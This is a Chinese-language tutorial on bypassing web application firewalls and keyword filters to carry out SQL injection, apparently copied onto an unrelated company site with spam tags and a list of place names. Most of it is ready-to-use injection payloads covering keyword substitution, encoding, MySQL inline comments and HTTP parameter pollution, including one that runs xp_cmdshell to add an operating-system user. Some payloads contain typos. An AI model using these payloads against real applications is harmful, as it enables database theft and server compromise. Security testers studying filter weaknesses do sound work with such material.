濮阳杆衣贸易有限公司

主頁(yè) > 知識(shí)庫(kù) > 關(guān)于SQL注入繞過(guò)的一些知識(shí)點(diǎn)

關(guān)于SQL注入繞過(guò)的一些知識(shí)點(diǎn)

熱門標(biāo)簽:簡(jiǎn)單的智能語(yǔ)音電銷機(jī)器人 怎么去開(kāi)發(fā)一個(gè)電銷機(jī)器人 南昌呼叫中心外呼系統(tǒng)哪家好 小程序智能電話機(jī)器人 河北便宜電銷機(jī)器人軟件 ai電話電話機(jī)器人 湖南保險(xiǎn)智能外呼系統(tǒng)產(chǎn)品介紹 怎么申請(qǐng)400熱線電話 泗洪正規(guī)電話機(jī)器人找哪家

一、 繞過(guò)waf思路

從第一步起,一點(diǎn)一點(diǎn)去分析,然后繞過(guò)。

1、過(guò)濾 and,or

preg_match('/(and|or)/i', $id)
Filtered injection: 1 or 1 = 1 1 and 1 = 1
Bypassed injection: 1 || 1 = 1 1  1 = 1

2、過(guò)濾 and, or, union

preg_match('/(and|or|union)/i', $id)
Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'

3、過(guò)濾 and, or, union, where

preg_match('/(and|or|union|where)/i', $id)
Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'

4、過(guò)濾 and, or, union, where, limit

preg_match('/(and|or|union|where|limit)/i', $id)
Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

5、過(guò)濾 and, or, union, where, limit, group by

preg_match('/(and|or|union|where|limit|group by)/i', $id)
Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1

6、過(guò)濾 and, or, union, where, limit, group by, select

preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'

7、過(guò)濾 and, or, union, where, limit, group by, select, ‘

preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)

8、過(guò)濾 and, or, union, where, limit, group by, select, ‘, hex

preg_match('/(and|or|union|where|limit|group by|select|'|hex)/i', $id)
Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))

9、過(guò)濾 and, or, union, where, limit, group by, select, ‘, hex, substr

preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)

10、過(guò)濾 and, or, union, where, limit, group by, select, ‘, hex, substr, 空格

preg_match('/(and|or|union|where|limit|group by|select|'|hex|substr|\s)/i', $id)
Filtered injection: 1 || lpad(user,7,1)
ypassed injection: 1%0b||%0blpad(user,7,1)

二、正則繞過(guò)

根據(jù)正則的的模糊匹配特性繞過(guò),比如過(guò)濾了'='

filtered injection: 1 or 1 = 1

Bypassed injection: 1 or 1,1 or ‘1',1 or char(97)

eg:
filtered injection:  1 union select 1, table_name from information_schema.tables where table_name = 'users'
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection:  1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed Injection:  1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273

三、通用繞過(guò)

1.注釋符

?id=1+un//ion+se//lect+1,2,3–

2.大小寫

?id=1+UnIoN//SeLecT//1,2,3–

3.關(guān)鍵字替換

有些waf等使用preg_replace替換了SQL關(guān)鍵字

?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+uni%0bon+se%0blect+1,2,3--

有時(shí)候注釋符'/**/‘可能被過(guò)濾,也可以使用%0b繞過(guò)

Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed : http://localhost/id/1%0b||%0blpad(first_name,7,1).html

4.編碼

一個(gè)經(jīng)典的腳本:Nukesentinel.php

// Check for UNION attack
  // Copyright 2004(c) Raven PHP Scripts
  $blocker_row = $blocker_array[1];
  if($blocker_row['activate'] > 0) {
  if (stristr($nsnst_const['query_string'],'+union+') OR \

  stristr($nsnst_const['query_string'],'%20union%20') OR \

  stristr($nsnst_const['query_string'],'*/union/*') OR \

  stristr($nsnst_const['query_string'],' union ') OR \

  stristr($nsnst_const['query_string_base64'],'+union+') OR \

  stristr($nsnst_const['query_string_base64'],'%20union%20') OR \

  stristr($nsnst_const['query_string_base64'],'*/union/*') OR \

  stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
   die("BLOCK IP 1 " );
  }
  }
Forbidden: http://localhost/php/?/**/union/**/select
Bypassed : http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed : http://localhost/php/?%2f**%2funion%2f**%2fselect

5.緩沖區(qū)溢出

http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10–

6.內(nèi)聯(lián)注釋(mysql)

http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--

四、高級(jí)繞過(guò)

1.HPP(http參數(shù)污染)

舉個(gè)例子:

index.php?par1=val1par1=val2
| web server | par1 |
| :— | :— |
| ASP.NET/IIS | val1,val2 |
| ASP/IIS | val1,val2 |
| PHP/Apache | val2 |
| JSP/Tomcat | val1 |

eg:

在ASP/ASP.NET的環(huán)境下

Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed : http://localhost/search.aspx?q=select nameq=password from users
Bypassed : http://localhost/search.aspx?q=select/*q=*/nameq=password/*q=*/from/*q=*/users
Bypassed : http://localhost/news.aspx?id=1'; /*id=1*/ EXEC /*id=1*/ master..xp_cmdshell /*id=1*/ net user test test /*id=1*/ --

2.HPC(http參數(shù)污染)

RFC2396定義了如下一些字符:

Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ()
Reserved : ; / ? : @  = + $ ,
Unwise : { } | \ ^ [ ] `

不同的Web服務(wù)器處理處理構(gòu)造得特殊請(qǐng)求時(shí)有不同的邏輯:

| Query String | Apache/2.2.16,PHP/5.3.3 | IIS6/ASP |
| :— | :— | :— |
| ?test[1=2 | test_1=2 | test[1=2 |
| ?test=% | test=% | test= |
| ?test%00=1 | test= | test=1 |
| ?test=1%001 | NULL | test=1 |
| ?test+d=1+2 | test_d=1 2 | test d=1 2 |

eg:

Forbidden: http://localhost/?xp_cmdshell
Bypassed : http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed : http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed : http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)

總結(jié)

以上就是關(guān)于sql注入繞過(guò)的技巧總結(jié),希望本文的內(nèi)容對(duì)大家的學(xué)習(xí)或者工作能帶來(lái)一定的幫助,如果有疑問(wèn)大家可以留言交流,謝謝大家對(duì)腳本之家的支持。

您可能感興趣的文章:
  • 防止xss和sql注入:JS特殊字符過(guò)濾正則
  • 一個(gè)過(guò)濾重復(fù)數(shù)據(jù)的 SQL 語(yǔ)句
  • MySQL注入繞開(kāi)過(guò)濾的技巧總結(jié)
  • SQL注入中繞過(guò) 單引號(hào) 限制繼續(xù)注入
  • SQL注入繞過(guò)的技巧總結(jié)
  • 多列復(fù)合索引的使用 繞過(guò)微軟sql server的一個(gè)缺陷
  • SQL Server簡(jiǎn)單模式下誤刪除堆表記錄恢復(fù)方法(繞過(guò)頁(yè)眉校驗(yàn))
  • Mysql如何巧妙的繞過(guò)未知字段名詳解
  • SQL注入技巧之顯注與盲注中過(guò)濾逗號(hào)繞過(guò)詳析

標(biāo)簽:威海 柳州 淮安 江蘇 那曲 景德鎮(zhèn) 瀘州 荊門

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《關(guān)于SQL注入繞過(guò)的一些知識(shí)點(diǎn)》,本文關(guān)鍵詞  關(guān)于,SQL,注入,繞過(guò),的,一些,;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《關(guān)于SQL注入繞過(guò)的一些知識(shí)點(diǎn)》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于關(guān)于SQL注入繞過(guò)的一些知識(shí)點(diǎn)的相關(guān)信息資訊供網(wǎng)民參考!
  • 推薦文章
    莱芜市| 平顺县| 阿图什市| 封丘县| 开鲁县| 宜良县| 宜川县| 额济纳旗| 会宁县| 庆安县| 崇明县| 教育| 长治县| 淮北市| 邳州市| 临沧市| 巴彦县| 汽车| 寿光市| 武城县| 龙里县| 枣强县| 栾城县| 调兵山市| 湘潭市| 嘉兴市| 永泰县| 水城县| 囊谦县| 梓潼县| 北海市| 怀化市| 庆城县| 玉树县| 乐至县| 西乡县| 蒲江县| 卢湾区| 赣州市| 平定县| 定远县|